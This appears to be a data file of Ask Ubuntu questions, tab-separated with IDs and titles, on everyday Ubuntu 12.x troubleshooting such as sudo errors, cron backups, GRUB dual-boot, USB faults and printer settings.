264569	error while sudoing	i am facing a issue . when i try to do sudo on my terminal i get : sudo : must be setuid root i googled for the problem and did as the suggestions like setting permission of sudo but they were already in the required state . can not figure out what may be the problem . please help . thanks output of mount : /dev/sda8 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda6 on /home type ext4 ( rw ) /dev/sda7 on /var type ext4 ( rw ) /home/incaendo/.private on /home/incaendo type ecryptfs ( ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=b746275454680798 , ecryptfs_fnek_sig=2164f6a8d7aa74c7 ) gvfs-fuse-daemon on /home/incaendo/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=incaendo )
264572	why does the sequence matter in the execution of these bash commands ?	there seems to be some inconsistency that i am not able to understand regarding the bash shell . if i execute : ls ; date ; time the results of the three queries are shown in sequence . however , on interchanging date and time position , an error message pops up . so if i execute : ls ; time ; date the error message says : bash : syntax error near unexpected token 'date ' . can someone explain this ?
264573	changing to a lower screen resolution	when i change the screen resolution of my laptop from 1366x768 to 1024x768 via [ displays ... ] , the entire screen is still filled . how can i have a 1-to-1 mapping such that the original proportions are preserved ? this i need particularly when i want to mirror the screen together with a beamer . ( in 9.10 it somewhat depended on the displays available at startup . if a lower resolution screen was added later on , proportions were retained )
264577	how to install java plugin for chrome	i followed the instructions in the accepted answer to this question and was able to correctly install the latest version of java 7 . however i do not have mozilla firefox installed but chrome . i was therefore wondering what should be the isntructions to execute instead of : mkdir ~/.mozilla/plugins ln -s /usr/lib/jvm/jdk1.7.0/jre/lib/amd64/libnpjp2.so ~/.mozilla/plugins/ sudo /etc/init.d/apparmor restart
264579	setup mobile broadband dell 5540 hspa card and ubuntu 12.10	i go to network connections select mobile broadband select add select dell wireless 5540 ( only option ) select united states select provider at & t for select plan , i can chose from media net ( phones ) , laptopconnect ( data cards ) , dataconnect ( old ) , and i choose laptopconnect then i get a settings window with three tabs - mobile broadband , ppp settings , and ipv4 settings ... it wants to know things like number , username , password , apn , network id , type , pin , ... i leave the last section to defaults ( which is mostly empty ) , and it does n't work . any guidance would be helpful .
264580	chmod : permissions of a directory do n't change	i have some issue with chmod : mis @ hell : /var/www/blah $ sudo chmod g+w .git -v mode of `.git ' changed from 0755 ( rwxr-xr-x ) to 0775 ( rwxrwxr-x ) mis @ hell : /var/www/blah $ ls -la | grep git $ drwxr-xr-x 1 www-data www-data 442 mar 6 09:30 .git it looks like chmod does n't change permissions of a directory in fact ( rwx vs r-x for group ) . why ?
264588	why does ati radeon have choppy display on linux ?	i 'm using radeon hd 7700m on ubuntu 12.10 and i 'm using catalyst 13.1 as the graphics driver . the problem is that i keep getting these horizontal lines appearing on the screen that look like the computer is refreshing display slowly . it happens particularly when i 'm watching an hd video or when there is rapid motion being displayed , but it could happen at other time like when i 'm browsing the internet or using the file browser ; but when i switch to intel gpu things get better , the problem still exists but to a much lesser degree . do all linux users have this problem with radeon 7 series ? is there a way to fix this problem without switching to intel gpu ? is there anything that i need to upgrade or downgrade or features that i could disable to reduce the problem ?
264589	`` error calling fsync ( 2 ) on /dev/sdc1 : input/output error '' while formatting my pendrive ?	i have a transcend 4 gb pen-drive . when i tried to format my pen-drive by right-clicking and selecting format , it showed : error creating file system : helper exited with exit code 1 : error calling fsync ( 2 ) on /dev/sdc1 : input/output error then i tried to remove the contents of the pen-drive through : rm -r software the folder `` software '' is present in my pen-drive but the response was : rm : can not remove `software ' : read-only file system
264592	where can i find perl 5.12.1 on ubuntu 11.04 ?	i have ubuntu server ( 11.04 ) and by default perl is 5.10.1 . i have installed another perl which i put at /opt/perl/bin/perl and its version is 5.12.1 . when i try to run /opt/perl/bin/perl -v it says no such file or directory .
264595	google chrome crashes on fresh 12.04 install	i just installed 12.04 and the first and only thing i did was install google-chrome-stable . when i run the program through terminal with google-chrome i get a few error ( the first 3 or so lines below ) then as i browse i get omniboxgtk errors and finally ( normally when a flash app or video is loaded ) the browser crashes entirely which i think is represented by the last line below . i am brand new to ubuntu so any help in getting this resolved is much appreciated ! josh @ josh-nv75s : ~ $ google-chrome [ 5137:5162:0305/235507 : error : object_proxy.cc ( 624 ) ] failed to get name owner . got org.freedesktop.dbus.error.namehasnoowner : could not get owner of name 'org.chromium.mtpd ' : no such name [ 5137:5162:0305/235507 : error : object_proxy.cc ( 624 ) ] failed to get name owner . got org.freedesktop.dbus.error.namehasnoowner : could not get owner of name 'org.chromium.mtpd ' : no such name [ 5137:5137:0305/235507 : error : object_proxy.cc ( 529 ) ] failed to call method : org.chromium.mtpd.enumeratestorages : object_path= /org/chromium/mtpd : org.freedesktop.dbus.error.serviceunknown : the name org.chromium.mtpd was not provided by any .service files [ 5137:5137:0305/235507 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0305/235514 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0305/235538 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0305/235614 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/000006 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/000155 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/000334 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/000415 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/000458 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/000946 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/001209 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) xdg-settings : unexpected/missing argument try 'xdg-settings -- help ' for more information . [ 5137:5137:0306/001448 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/001503 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/001508 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/001538 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/001540 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/002021 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/002604 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/002612 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/002616 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 5137:5137:0306/002633 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) floating point exception ( core dumped )
264597	checking media [ fail ] on boot	lately i 've been getting this black screen at boot time with 2 lines saying checking media [ fail ] and the time of booting has extended greatly due to that thing ( like from seconds to a minute ) i have a dell xps15 with ssd and i 'm running ubuntu 12.10 and it was not like this before . i do n't have a clue what is it connected with - maybe it 's due to a kernel update or something . and what do those 2 lines mean .
264601	after installing with wubi , ca n't boot into ubuntu	i installed ubuntu ( 12.10 ) through wubi and when i go to the dual boot screen , i choose ubuntu . but all it does is showing me a grub menu which says : this is a minimalistic command ( something something.. ) and i have only the option to press tab and see some commands . nothing works . please help me guys . i installed it with windows 7 .
264602	install windows on fully encrypted ubuntu machine	like the title suggest i want to install windows 7 beside ubuntu for gaming purposes . ubuntu 12.10 has been installed and completely encrypted with luks/lvm . bootloader is grub . hard drive is ext2 . is it even possible to install windows now ? cause i really wan na play games and if it does n't work i have to dump ubuntu but i really like it . wine and vm 's are n't working either . i 've asked this question on so many boards but no one seems to be able to help me .
264606	how do i view the number of pages of a print job in the printer queue ?	i ca n't find anything about the number of pages of a job that 's in the printer queue ( that 's yet to be released ) . i 've tried looking through the attributes via `` view attributes '' , but the number of pages is not shown on the window . is it possible to view this ?
264607	bash script not executing from crontab	i have the following bash script : # ! /bin/bash mysqldump -u ******** -p******** -- all-databases | gzip > /home/srvlinux01/mysqlbackups/database_ $ ( date +\ % y-\ % m-\ % d ) .sql.gz which is located in /home/srvlinux01/mysqlbackups/ as backup.sh with the following permissions -rwxr -- r -- 1 root root 134 feb 27 12:48 backup.sh i 've set up a cronjob on sudo crontab -e to run it every day , at night # automatic mysql backup 30 3 * * * sh /home/srvlinux01/mysqlbackups/backup.sh but i get emailed the following error : sh : 0 : ca n't open /home/srvlinux01/mysqlbackups/backup.sh i 've been trying different setups , but ca n't figure out what is wrong . i can run the script manually and everything goes perfectly , so i guess there is something wrong with my cronjob entry , but ca n't really understand what . could you please help me figure it out ? thanks !
264608	grub does n't see windows 7 after installing ubuntu 12.04	so , this is my first time installing ubuntu on my hard drive , and i 'm running into some problems . until a couple of hours ago , i had 4 partitions in my hard drive : xp vista 7 data partition i backup up the xp and vista partitions which were n't of any use lately , and booted a live-usb with ubuntu 12.04 . on the `` install 12.04 lts '' partition manager thingy i deleted the xp and vista partitions ( which where sda1 and sda2 on the partition table ) , leaving around 260gb of free space . there , i made 3 partitions : 8gb for root , 4gb for swap , and 80gb for home . ( i know , i probably made a mess out of the partition table . ) i then proceeded to install ubuntu , hoping to be able to move back and forth between 7 and ubuntu , but grub does n't seem to recognize my windows installation . i read some forums , and tried two things , neither of which actually worked : i added a # to grub_hidden_timeout=0 in /etc/default/grub to at least be able to see the grub screen when booting , and effectively , windows 7 was n't there . i ran boot-repair from my live-usb , but it did n't solve the problem either . anyway , i got the boot info at least , which i 'm linking right away : paste.ubuntu.com/5589763/ so , this is my family computer , and i 'm probably getting killed in the morning if i do n't sort this out . any advice is truly , truly appreciated . thanks in advance !
264614	kubuntu and kde 4.10 ppa	i have messed up my installation , while trying to update to kde 4.10 . i added the backports ppa ( ppa : kubuntu-ppa/backports ) and apparently did the upgrade . however , it looks like it was just partial . i see some packages at 4.10 , and some others at 4.9.4 . if i go to any kde app and click on help - about kde , it displays 4.9.4 . for example , kdelibs-bin is at 4.9.4 . if i inspect the package in aptitude , i see that the ppa source is listed as 4:4.10.0-0ubuntu3~ubuntu12.10~ppa1 but it is not selected . on the other hand , i see kde-base-artwork as 4.10 from the backports ... what 's wrong ? how can i update everything ? edit : today i see lots of packages suggesting update to 4.9.5 ... and the 4.10 version available but not selected ... thanks ! !
264615	unable to install in mongodb	i am tring to install mongodb but its getting failed again and again . i am getting following error : mongodb is not found . i using following command to install mongodb : sudo apt-get install mongodb
264616	will installing gnome shell affect unity ?	is it possible to install gnome 3 and switch between gnome and unity ? if i run sudo apt-get install gnome-shell will it remove unity , or break it ? i wanted to make sure , before i install gnome . my goal is to try out gnome , without removing unity . or just to be able to switch between them . i 've heard some of my friends talk about it should be possible at login screen ?
264623	pidgin unable to connect to gtalk	i ca n't believe i 'm raising this question after years , but after a fresh installation of ubuntu 12.10 , i 'm unable to connect pidgin to google talk . i use a google apps domain name , and the settings that i 'm using are : protocol : xmpp username : **** domain : ********.com resource : home in the advanced tab , connection security : require encryption . uncheck allow plaintext auth over unencrypted steams connect port : 5222 connect sever : talk.google.com file transfer proxies : proxy.eu.jabber.org bosh url : ( blank ) in the proxy tab , no proxy . i had used these same settings on 12.04 and it had worked like a charm . any help will be appreciated .
264625	how to set up ssd raid and trim support ?	i am looking to set up a new server . i can only use intel 520 series 240gb mlc ssds or standard seagate 7200rpm disks . these are the non negotiable options . naturally , as this is going to be running mysql with its primary task being a mysql server . as the biggest performance bottleneck being disk i/o , i would prefer to use the ssds . i need to have close to 1tb of disk space . now , raid5 does not give the best performance and is rumoured to not be best for ssds , so i am looking at a raid 10 ( 1+0 ) setup which would give me 720gb ( 240gb * 3 ) i need to know how i can set this up with ubuntu 12.04.01 lts using software raid and to make sure that trim support ( discard i think its called in linux ) is enabled for the raid config . has anyone do n't this successfully ? any howto info and stuff to watch out for and basically what tools to use and so on would be of great assistance . ideally , i also need to be able to boot off the ssd raid array . can anyone point me in the right direction ? thanks .
264641	will it cost money to upload a phone application ?	similar to how apple and microsoft require you to buy a developer 'subscription ' for $ 99 . the google play costs $ 25 , does ubuntu have a similar cost or is it free ?
264643	livecd + truecrypt drive have write disabled	i 've booted into my computer using a ubuntu 12.04 livecd , and have installed truecrypt . i have mounted a truecrypt drive , but i ca n't seem to create any files/folders on the truecrypt drive . the options are grayed out . anyone know why is this happening ? even though i made sure the readonly option is disabled when mounting via truecrypt . apparently i am not the owner of the drive so i ca n't change the permissions ... i am the owner . i 've tried this on 2 different computers and both have the same issue . however , if i mount the truecrypt drive on the original computer it was created on using a hdd installation of ubuntu instead of a livecd , the truecrypt drive works perfectly well as expected . so basically , using a livecd , i boot into the computer , and install truecrypt , which i guess gets installed on the computers ram . i then attach a usb storage device to the computer . the usb storage device is a fully encrypted drive . when i mount this drive using truecrypt , i can see everything in the drive , but i can not add/edit anything in the drive . how do write to the drive ?
264646	deploy multiple services in same host/machine with juju ?	currently juju deploy service per node . is that possible to deploy many services in the same node [ even specify existant node ] ? there is juju-jitsu as alternative to do that ! ! ! does anyone had experience or feedback with it ? thanks : - )
264651	can not change paper size on printer	i try to change paper size from na_letter_8.5x11in to a4 , but settings are not saved . when i press `` apply '' , the setting goes back to na_letter_8.5x11in . the printer is a network connected toshiba if that matters . i go into the printer settings and press job options on the printer in question .
264654	diagnose and fix usb not working	i recently received a laptop ( lenovo thinkpad x220 ) at work with ubuntu 12.04 64bit installed that works just fine except that one of the two usb ports does n't work . i have no idea how to find and solve the problem , so i would be grateful if you could help me . please note that i have also posted the same question on ubuntuforums.org , but since i am not getting any reply i though to try with askubuntu as well . when i connect my external usb hd to the port that does n't work , the power led does n't even turn on . the same is if i try to charge my smartphone using usb , neither it charges or detects that it has been connected to a usb port . the other port works just fine . reading around i thought that you might be interested in the output of sudo lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 04f2 : b217 chicony electronics co. , ltd bus 002 device 012 : id 04e8:689e samsung electronics co. , ltd gt-s5670 [ galaxy fit ] in this moment i am charging my mobile using the working usb port ( that is the last device listed : bus 002 device 012 : id 04e8:689e samsung electronics co. , ltd gt-s5670 [ galaxy fit ] ) also the output of dmesg | grep -i usb just after connecting my external hd to the port that is not working is : [ 0.721602 ] usbcore : registered new interface driver usbfs [ 0.721611 ] usbcore : registered new interface driver hub [ 0.721632 ] usbcore : registered new device driver usb [ 0.966833 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 0.966906 ] ehci_hcd 0000:00:1a.0 : new usb bus registered , assigned bus number 1 [ 0.985372 ] ehci_hcd 0000:00:1a.0 : usb 2.0 started , ehci 1.00 [ 0.985539 ] hub 1-0:1.0 : usb hub found [ 0.985649 ] ehci_hcd 0000:00:1d.0 : new usb bus registered , assigned bus number 2 [ 1.005326 ] ehci_hcd 0000:00:1d.0 : usb 2.0 started , ehci 1.00 [ 1.005480 ] hub 2-0:1.0 : usb hub found [ 1.005530 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 1.005538 ] uhci_hcd : usb universal host controller interface driver [ 1.005572 ] usbcore : registered new interface driver libusual [ 1.296702 ] usb 1-1 : new high-speed usb device number 2 using ehci_hcd [ 1.429221 ] hub 1-1:1.0 : usb hub found [ 1.540210 ] usb 2-1 : new high-speed usb device number 2 using ehci_hcd [ 1.672657 ] hub 2-1:1.0 : usb hub found [ 1.743947 ] usb 1-1.6 : new high-speed usb device number 3 using ehci_hcd [ 18.521031 ] input : integrated camera as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.0/input/input6 [ 18.521100 ] usbcore : registered new interface driver uvcvideo [ 18.521102 ] usb video class driver ( 1.1.1 ) [ 55417.219229 ] usb 2-1.2 : new high-speed usb device number 3 using ehci_hcd [ 55417.642880 ] initializing usb mass storage driver ... [ 55417.643124 ] scsi6 : usb-storage 2-1.2:1.3 [ 55417.643271 ] usbcore : registered new interface driver usb-storage [ 55417.643274 ] usb mass storage support registered . [ 55418.329239 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 55418.330234 ] usbcore : registered new interface driver cdc_acm [ 55418.330235 ] cdc_acm : usb abstract control model driver for usb modems and isdn adapters [ 55480.125260 ] usb 2-1.2 : usb disconnect , device number 3 [ 55480.339914 ] usb 2-1.2 : new high-speed usb device number 4 using ehci_hcd [ 55480.423716 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 55480.647257 ] usb 2-1.2 : device descriptor read/all , error -71 [ 55480.718860 ] usb 2-1.2 : new high-speed usb device number 5 using ehci_hcd [ 55480.802861 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 55480.990427 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 55481.165890 ] usb 2-1.2 : new high-speed usb device number 6 using ehci_hcd [ 55481.398424 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 55481.400982 ] scsi7 : usb-storage 2-1.2:1.3 [ 55482.490830 ] usb 2-1.2 : reset high-speed usb device number 6 using ehci_hcd [ 55482.574686 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 55482.762253 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 55482.937841 ] usb 2-1.2 : reset high-speed usb device number 6 using ehci_hcd [ 55483.021627 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 55483.209179 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 55483.384919 ] usb 2-1.2 : reset high-speed usb device number 6 using ehci_hcd [ 55483.630217 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 55562.625282 ] usb 2-1.2 : usb disconnect , device number 6 [ 55562.828624 ] usb 2-1.2 : new high-speed usb device number 7 using ehci_hcd [ 55562.925088 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 55562.927674 ] scsi8 : usb-storage 2-1.2:1.3 [ 56273.854408 ] usb 2-1.2 : reset high-speed usb device number 7 using ehci_hcd [ 56273.938197 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 56274.343462 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 56278.962780 ] usb 2-1.2 : reset high-speed usb device number 7 using ehci_hcd [ 56279.057047 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 56283.564436 ] usb 2-1.2 : reset high-speed usb device number 7 using ehci_hcd [ 56284.051103 ] usb 2-1.2 : device not accepting address 7 , error -71 [ 56284.123030 ] usb 2-1.2 : reset high-speed usb device number 7 using ehci_hcd [ 56284.609747 ] usb 2-1.2 : device not accepting address 7 , error -71 [ 56284.681867 ] usb 2-1.2 : reset high-speed usb device number 7 using ehci_hcd [ 56284.922513 ] usb 2-1.2 : device descriptor read/8 , error -71 [ 56285.046526 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 56285.132732 ] usb 2-1.2 : reset high-speed usb device number 7 using ehci_hcd [ 56285.238421 ] usb 2-1.2 : device descriptor read/all , error -71 [ 56285.308492 ] usb 2-1.2 : reset high-speed usb device number 7 using ehci_hcd [ 56285.403240 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 57096.818137 ] usb 2-1.2 : reset high-speed usb device number 7 using ehci_hcd [ 57096.901880 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 57097.089512 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 57097.265097 ] usb 2-1.2 : reset high-speed usb device number 7 using ehci_hcd [ 57097.348908 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 57097.536488 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 57097.712071 ] usb 2-1.2 : reset high-speed usb device number 7 using ehci_hcd [ 57098.126982 ] usb 2-1.2 : device not accepting address 7 , error -71 [ 57098.198973 ] usb 2-1.2 : reset high-speed usb device number 7 using ehci_hcd [ 57098.613865 ] usb 2-1.2 : device not accepting address 7 , error -71 [ 57098.614516 ] usb 2-1.2 : usb disconnect , device number 7 [ 57098.693980 ] usb 2-1.2 : new high-speed usb device number 8 using ehci_hcd [ 57098.790320 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 57098.793036 ] scsi9 : usb-storage 2-1.2:1.3 [ 57159.140620 ] usb 2-1.2 : reset high-speed usb device number 8 using ehci_hcd [ 57159.224442 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 57159.412001 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 57159.587605 ] usb 2-1.2 : reset high-speed usb device number 8 using ehci_hcd [ 57159.671410 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 57159.858988 ] usb 2-1.2 : device descriptor read/64 , error -71 [ 57160.034616 ] usb 2-1.2 : reset high-speed usb device number 8 using ehci_hcd [ 57160.449442 ] usb 2-1.2 : device not accepting address 8 , error -71 [ 57160.521426 ] usb 2-1.2 : reset high-speed usb device number 8 using ehci_hcd [ 57160.760985 ] usb 2-1.2 : device descriptor read/8 , error -71 [ 57160.892816 ] usb 2-1.2 : device descriptor read/8 , error -71 [ 57160.996633 ] usb 2-1.2 : usb disconnect , device number 8 [ 57161.076176 ] usb 2-1.2 : new high-speed usb device number 9 using ehci_hcd [ 57161.172729 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 57161.175634 ] scsi10 : usb-storage 2-1.2:1.3 [ 58462.392065 ] usb 2-1.2 : usb disconnect , device number 9 [ 58462.597520 ] usb 2-1.2 : new high-speed usb device number 10 using ehci_hcd [ 58462.693941 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 58462.696673 ] scsi11 : usb-storage 2-1.2:1.3 [ 58463.770690 ] usb 2-1.2 : reset high-speed usb device number 10 using ehci_hcd [ 58464.068982 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 58464.165966 ] usb 2-1.2 : reset high-speed usb device number 10 using ehci_hcd [ 58464.309933 ] usb 2-1.2 : device descriptor read/all , error -71 [ 58464.381469 ] usb 2-1.2 : reset high-speed usb device number 10 using ehci_hcd [ 58464.599206 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 58465.457203 ] usb 2-1.2 : usb disconnect , device number 10 [ 58465.662554 ] usb 2-1.2 : new high-speed usb device number 11 using ehci_hcd [ 58465.758897 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 58465.761398 ] scsi12 : usb-storage 2-1.2:1.3 [ 59568.263446 ] usb 2-1.2 : reset high-speed usb device number 11 using ehci_hcd [ 59568.378228 ] usb 2-1.2 : device firmware changed [ 59568.378474 ] usb 2-1.2 : usb disconnect , device number 11 [ 59568.455033 ] usb 2-1.2 : new high-speed usb device number 12 using ehci_hcd [ 59568.551166 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 59568.553694 ] scsi13 : usb-storage 2-1.2:1.3 i have no idea what the output means , but as you can see there are some errors listed . if you require more information just ask ,
264656	update manager in ubuntu 12.04 is not working	w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/release.gpg something wicked happened resolving 'archive.canonical.com : http ' ( -5 - no address associated with hostname ) , e : some index files failed to download . they have been ignored , or old ones used instead . i get the above lines when i try to install my upgrades in my ubuntu 12.04 . i have a working internet connection where im able to browse pls help . whenever i check it shows the number of upgrades available but it does n't download any . kindly help , balasubramani .
264666	how to prevent system blocking due to some i/o activities ?	sometimes my system ( ubuntu 10.04 .. 12.04 ) becomes almost unresponsive due to some i/o activities . for example , this happens when some ram content is being moved to swap on resume from suspend mode . i 've made that conclusion after looking into htop ( swap size was growing ) and iotop ( swap process i/o rate was about 3mb/s ) output . another example is /etc/cron.daily/popularity-contest . when it is running the system becomes unusable . ==========update 7.03.2013=========== one more example , updatedb.mlocate ( i/o rate 3-5mb/s ) , as you can see below there was enough free ram when it was running # free -m total used free shared buffers cached mem : 3919 3494 424 0 10 107 -/+ buffers/cache : 3377 542 swap : 4102 134 3967 ===================================== first of all , it is not quite clear for me why i/o activity causes other running applications being blocked ? second question : is there any way to avoid that annoying happening ? ==========update 7.03.2013=========== i did n't ever noticed such effect on windows . thus i believe there must be some system property which can be tuned . ===================================== sys . info : ubuntu 12.04 x86_64 laptop ( sata hdd 5400rpm ) , ram 4gb .
264669	how to change lock screen shortcut for ubuntu 12.10 ?	right now , ctrl + alt + l locks the screen but i want to make it windows key + l as the shortcut , how can i do it ? thanks
264670	how do i install ubuntu allong side an existing windows 7 ?	i have a 600gb hard disk which has three partitions c , d and e in windows 7 . windows 7 is installed on the c drive . now i want to install ubuntu on e drive . how do i do this ? is it a good idea to install with wubi ? btw , is it possible to use gnome instead of the unity ?
264671	how can i change the name of remote desktop in ubuntu 12.04	i am using gnome classic de with ubuntu 12.04 . the vino vnc server is functioning perfectly but it annoyingly advertises itself on the lan as `` ( user ) 's remote desktop on ( server ) '' . i 've looked at gsettings list-recursively org.gnome.vino and there does n't appear to be an easy way to change this in vino 's settings . seen this asked a few other places around the net with no answers so far . any help would be greatly appreciated .
264673	juju charm zentyal isssue	does anybody knows/worked with juju charm zentyal . this is what i could find in repo . http : //jujucharms.com/~christophe.sauthier/precise/zentyal i tried this charm and it does n't worked . could n't login . then i downloaded it to local rep . modified a bit install hook to get newer version of zentyal . also on accessing it through browser i cant login . i cant understand where the problem lies ! any advise what to look for . thanks in advance .
264674	alsa driver compiled with errors 12.04.02 lts	i have a problem with installing the alsa driver . here is the compilation log : in file included from /home/aleks/alsa-driver-1.0.25/firewire/speakers.c:5:0 : /home/aleks/alsa-driver-1.0.25/firewire/../alsa-kernel/firewire/speakers.c : в функции «fwspk_card_free» : /home/aleks/alsa-driver-1.0.25/firewire/../alsa-kernel/firewire/speakers.c:664:2 : ошибка : неявная декларация функции «fw_device_put» [ -werror=implicit-function-declaration ] /home/aleks/alsa-driver-1.0.25/firewire/../alsa-kernel/firewire/speakers.c : в функции «fwspk_probe» : /home/aleks/alsa-driver-1.0.25/firewire/../alsa-kernel/firewire/speakers.c:721:2 : ошибка : неявная декларация функции «fw_device_get» [ -werror=implicit-function-declaration ] cc1 : some warnings being treated as errors make [ 3 ] : *** [ /home/aleks/alsa-driver-1.0.25/firewire/speakers.o ] ошибка 1 make [ 2 ] : *** [ /home/aleks/alsa-driver-1.0.25/firewire ] ошибка 2 make [ 1 ] : *** [ _module_/home/aleks/alsa-driver-1.0.25 ] ошибка 2 make [ 1 ] : выход из каталога `/usr/src/linux-headers-3.5.0-25-generic' make : *** [ compile ] ошибка 2`
264676	pressure sensitivity with wacom bamboo in inkscape 0.48	the pressure sensitivity for my wacom bamboo pen & touch in inkscape 0.48 ( running ubuntu 12.04 ) does not work . i ticked all options in input devices ( wacom bamboo 16fg 4x5 pen stylus ; wacom bamboo 16fg 4x5 pen eraser ; wacom bamboo 16fg 4x5 finger touch ; wacom bamboo 16fg 4x5 finger pad ) . also ticked use pressure-sensitive tablet in the mouse dialog in inkscape preferences . the pen ( both sides : pen and eraser ) works fine as a pointer but that 's it . is there any solution ?
264680	running /usr/lib/nagios/plugins/check_apt as nagios user does not return the correct result	i have two servers , both running 12.04 server , and nagios-nrpe-server . on both , i have configured the command check_apt , which runs /usr/lib/nagios/plugins/check_apt . on both , nagios-nrpe-server is configured to run as the nagios user . unfortunately , on one of the servers , i always receive an ok signal with 0 updates when , from a different server , i run /usr/lib/nagios/plugins/check_nrpe -h hostname -c check_apt , despite there being updates . i followed this through and noticed that on one server , check_apt runs as the nagios user and does indeed return with a warning or critical when required . the other , problematic server , always says 0 updates required when run as the nagios user , but will always give the correct response when run as root . on this problematic server , i also note that the motd always displays the wrong number of packages . it 's as if neither commands are allowed to access the number of updates for a server .
